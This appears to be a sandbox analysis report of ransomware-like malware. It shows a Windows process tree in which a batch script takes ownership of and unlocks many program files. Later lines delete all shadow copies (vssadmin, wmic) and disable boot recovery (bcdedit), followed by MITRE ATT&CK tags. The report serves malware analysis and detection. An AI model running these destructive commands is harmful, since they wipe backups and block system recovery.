C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\PDIALOG.exe""2⤵PID:204
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\PDIALOG.exe" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\PDIALOG.exe"3⤵PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "PDIALOG.exe" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "PDIALOG.exe" -nobanner4⤵PID:1576
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Journal\Templates\Music.jtp""2⤵PID:1968
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G Admin:F /C3⤵PID:1220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Music.jtp"3⤵
- Modifies file permissions
PID:1032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "Music.jtp" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "Music.jtp" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files\Windows Mail\WinMail.exe""2⤵PID:1080
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:1512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\WinMail.exe"3⤵PID:1224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "WinMail.exe" -nobanner3⤵PID:1292
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1240
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1376
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C3⤵PID:1488
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"3⤵PID:1216
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "br.gif" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "br.gif" -nobanner4⤵PID:652
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:436
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""2⤵PID:1032
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C3⤵PID:360
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"3⤵PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "forms_received.gif" -nobanner3⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "forms_received.gif" -nobanner4⤵PID:1552
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1180
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:1240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:1376
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:1080
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif""2⤵PID:744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif" /E /G Admin:F /C3⤵PID:652
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_issue.gif"3⤵
- Modifies file permissions
PID:592
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "server_issue.gif" -nobanner3⤵PID:436
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "server_issue.gif" -nobanner4⤵PID:216
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:760
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif" /E /G Admin:F /C3⤵PID:1552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInAcrobat.gif"3⤵PID:220
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "turnOffNotificationInAcrobat.gif" -nobanner4⤵PID:1032
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1292
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:1488
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "AdobePiStd.otf" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "AdobePiStd.otf" -nobanner4⤵PID:1224
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1368
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""2⤵PID:984
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C3⤵PID:232
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"3⤵
- Modifies file permissions
PID:676
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "MinionPro-Regular.otf" -nobanner3⤵PID:360
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "MinionPro-Regular.otf" -nobanner4⤵PID:760
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:744
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:280
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵PID:700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1836
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1292
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:544
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""2⤵PID:1840
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C3⤵PID:1956
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"3⤵PID:1520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner3⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner4⤵PID:1368
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""2⤵PID:216
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C3⤵PID:1820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"3⤵
- Modifies file permissions
PID:760
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "can03.ths" -nobanner3⤵PID:1752
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "can03.ths" -nobanner4⤵PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1812
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""2⤵PID:896
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C3⤵PID:980
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"3⤵PID:1292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "usa03.ths" -nobanner3⤵PID:864
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "usa03.ths" -nobanner4⤵PID:1896
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1644
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""2⤵PID:1224
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"3⤵PID:1368
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "CROATIAN.TXT" -nobanner3⤵PID:592
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "CROATIAN.TXT" -nobanner4⤵PID:1220
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:236
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:548
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:524
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1064
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1156
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:992
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵PID:1896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1488
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1644
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1240
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:212
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:1080
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Modifies file permissions
PID:752
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1372
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:1056
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\EkB6nxWp.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""2⤵PID:548
-
C:\Windows\SysWOW64\cacls.execacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C3⤵PID:216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"3⤵
- Modifies file permissions
PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c B4ux2Scs.exe -accepteula "watermark.png" -nobanner3⤵PID:1472
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula "watermark.png" -nobanner4⤵PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\B4ux2Scs.exeB4ux2Scs.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:364
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {918E5ADE-98B0-42C0-9E6C-DD023FD281D7} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]1⤵PID:940
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\3UeOqcQE.bat"2⤵PID:1680
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
PID:1828
-
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
PID:212
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:1220
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
PID:1368
-
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵PID:864
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1844
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
File Deletion
2File and Directory Permissions Modification
1Modify Registry
3